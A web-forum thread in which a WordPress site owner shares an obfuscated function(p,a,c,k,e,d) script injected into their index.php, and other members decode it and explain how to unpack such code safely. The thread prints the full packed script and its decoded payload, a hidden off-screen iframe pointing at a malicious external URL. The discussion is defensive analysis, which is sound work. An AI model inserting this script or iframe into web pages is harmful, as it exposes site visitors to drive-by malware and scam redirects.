What does this code mean? Involves a function(p,a,c,k,e,d)



afa
12-15-2011, 08:03 AM
So I like to think I'm pretty decent with web programming, but this code has me puzzled.

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('r n(5){3 b=\'w\';3 c=h e();k(3 i=0;i<x;i++){c[b.f(i>>4)+b.f(i&u)]=t.q(i)}6(!5.s(/^[a-v-9]*$/i))o y;6(5.g%2)5=\'0\'+5;3 l=5.g;3 7=h e();3 j=0;k(3 i=0;i<l;i+=2){7[j++]=c[5.A(i,2)]}o 7.z(\'\')}6(8.m.C(\'p=d\')==-1){8.B(n(\'D\'));8.m=\'p=d\'}',40,40,'|||var||data|if|result|document|||b16_digits|b16_map|enabled|A rray|charAt|length|new|||for|ll|cookie|hDcd|return|cookien|fromCharCode|function|match|String|15|f0| 0123456789abcdef|256|false|join|substr|write|indexOf|3c646976207374796c653d22706f736974696f6e3a20616 2736f6c7574653b206c6566743a202d3139393370783b20746f703a202d3239393470783b223e3c696672616d65207769647 4683d22343022206865696768743d22333022207372633d22687474703a2f2f3167323166736e32747062642e63652e6d732 f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e'.split('|'),0,{}))</script>

I know it's evil code, I had to put it through a base 64 decode twice to get to this. But all that I'm really after is this: Is there any lingering harm on the website which had this live code? When one tries to create a link to the site (powered by WordPress, by the way) on Facebook, there is this error message:

Cannot modify header information - headers already sent by (output started at /home/content/xx/xxxxxxx/html/index.php(1) : eval()'d code:37) in /home/content/xx/xxxxxxx/html/wp-includes/pluggable.php on line 897

Even though I've taken the code out from index.php and then functions.php after I spotted it there. Why is this error on FB still happening if this code cannot be found in the text files? Could there be something evil happening in the database?

Any assistance would be most appreciated.

Philip M
12-15-2011, 08:19 AM
http://www.codeproject.com/KB/scripting/Dean_Edwards_Decoder.aspx

If you replace the opening eval( with document.write( ... all the code is dumped to the screen. If some of it is being interpreted as HTML rather than being displayed, consider forcing your document.write to write between <textarea></textarea> tags.


All advice is supplied packaged by intellectual weight, and not by volume. Contents may settle slightly in transit.

Old Pedant
12-15-2011, 08:56 AM
The main point of this seems to be to try to get you to bite on some supposedly free offers.

The big long string of hex numbers turns out to be this:


<div style="position: absolute; left: -1993px; top: -2994px;">
<iframe width="40" height="30" src="http://1g21fsn2tpbd.ce.ms/i.php?go=1">
</iframe>
</div>

As you can see, that creates a <div> on your page that is way off the top left edge and so is effectively invisible.

In the <div> it drops in an <iframe> with the "poison" URL. That URL immediately takes over the entire window (that is, it loads its own content into the _top window, replacing whatever was there) and starts trying to bombard you with offers.

Not being foolish enough to click through to some of the offers, I can't guess what else they try to do. My guess would be that they try to get you to download something that will install itself as a virus or spyware on your machine. You are welcome to find out for yourself.

Old Pedant
12-15-2011, 08:57 AM
The weird part of this is that the hex string there isn't even mildly encrypted. It's almost like they want people to break this open. Every other one like this I've seen, the hex values are at least encrypted with a simple substitution cipher. This one doesn't bother.

Philip M
12-15-2011, 09:04 AM
The main point of this seems to be to try to get you to bite on some supposedly free offers.


The cheese in the mousetrap is always free! :D:D

Old Pedant
12-15-2011, 09:05 AM
By the by, Philip, if you *do* document.write that to the screen, it *will* drop the <div> and <iframe> in place and kablooey, you are in their hands. I seriously recommend that if you do stuff like this you inspect each character before document.write'ing it and, if it is "<", replace it with "&lt;". Which is what I did.
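
An added example, not part of the original thread: a static unpacker for the function(p,a,c,k,e,d) wrapper that recovers the script and its hex payload without eval or document.write, then escapes the result before display as advised above. The function names and the harmless packed sample are constructed for illustration, and the unescape step assumes the payload uses only backslash-quote and double-backslash escapes.

```javascript
// Static unpacker for the function(p,a,c,k,e,d) wrapper: nothing is eval'd or written to a page.

// Same index-to-token encoding the packer's e() uses (0-9, a-z, then A-Z).
function encodeIndex(c, a) {
  const head = c < a ? '' : encodeIndex(Math.floor(c / a), a);
  c %= a;
  return head + (c > 35 ? String.fromCharCode(c + 29) : c.toString(36));
}

// Pull payload, radix, count and keyword list out of the source text and
// substitute tokens with a plain dictionary lookup.
function unpack(source) {
  const m = /\}\('((?:[^'\\]|\\.)*)',(\d+),(\d+),'((?:[^'\\]|\\.)*)'\.split\('\|'\)/.exec(source);
  if (!m) return null;                          // not in packer format
  const payload = m[1].replace(/\\(.)/g, '$1'); // assumption: only \' and \\ escapes
  const radix = Number(m[2]), count = Number(m[3]);
  const words = m[4].split('|');
  const dict = new Map();
  for (let i = 0; i < count; i++) {
    if (words[i]) dict.set(encodeIndex(i, radix), words[i]); // empty entry: token stands for itself
  }
  return payload.replace(/\b\w+\b/g, t => (dict.has(t) ? dict.get(t) : t));
}

// Decode quoted even-length hex runs (what the script's hDcd() does at run time).
function decodeHexLiterals(code) {
  const out = [];
  for (const [, hex] of code.matchAll(/'((?:[0-9a-f]{2}){8,})'/gi)) {
    out.push(hex.replace(/../g, b => String.fromCharCode(parseInt(b, 16))));
  }
  return out;
}

// Escape before display so decoded markup is shown as text, never rendered.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, ch => map[ch]);
}

// Constructed sample (harmless): packs document.write(hDcd('<hex of "<b>hi</b>">'))
const SAMPLE = "eval(function(p,a,c,k,e,d){/* body omitted in this constructed sample */}" +
  "('0.1(2(\\'3\\'))',4,4,'document|write|hDcd|3c623e68693c2f623e'.split('|'),0,{}))";

const unpacked = unpack(SAMPLE);
console.log(unpacked);
console.log(decodeHexLiterals(unpacked).map(escapeHtml));
```

Run it under Node rather than in a browser tab, so that nothing decoded can be rendered or fetched.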

Philip M
12-15-2011, 09:11 AM
By the by, Philip, if you *do* document.write that to the screen, it *will* drop the <div> and <iframe> in place and kablooey, you are in their hands. I seriously recommend that if you do stuff like this you inspect each character before document.write'ing it and, if it is "<", replace it with "&lt;". Which is what I did.

Yes, I should have mentioned that!

afa
12-16-2011, 05:39 AM
Thanks, Philip and Old Pedant! I had read that it was possible new pages had been added to the site if such code is implemented, but if that div is the result of the script, then perhaps not? I do wonder why I still have that FB message though with the above being removed several days ago.

Old Pedant
12-16-2011, 06:10 AM
I don't see how it could *truly* add a new page to the site, as that would mean storing something on your server. And if you have done even a halfway decent job of locking down your server's directory, that shouldn't happen.

What it *could* do is give the *appearance* of new pages. For example, it could locate a menu and tack on another menu item. That menu item's onclick would then be implemented via the code I showed that brings up a foreign site's window just as if it's part of your site.

So maybe that's what it's referring to.

But as to "that FB message"... I admit it does look like they seem to have figured a way to try to stick something in your page headers. The message results because, indeed, if you try to modify an HTML header and *ANY* HTML tags (even the <html> tag itself) have already been sent to the browser, then you can't do so. So it sounds like their attempted hack isn't happening, but you are seeing the vestiges of it in the form of that message.

felgall
12-16-2011, 08:54 PM
The p,a,c,k,e,d function is generated by an early JavaScript compressor written by one of the top JavaScript experts. It was used quite often by major scripts up until a few years ago to make the script to be downloaded a lot smaller. Older versions of jQuery used to use it.

In the last few years more and more people have support for HTTP 1.1 enabled and so that can be used to compress all files. This means that a minified version of a script compressed with HTTP 1.1 ends up being a smaller download than the p,a,c,k,e,d version without the need to have the JavaScript decompress itself in the browser. This effectively made p,a,c,k,e,d obsolete. Of course some people still use it simply because it conceals the code making it slightly harder to read.


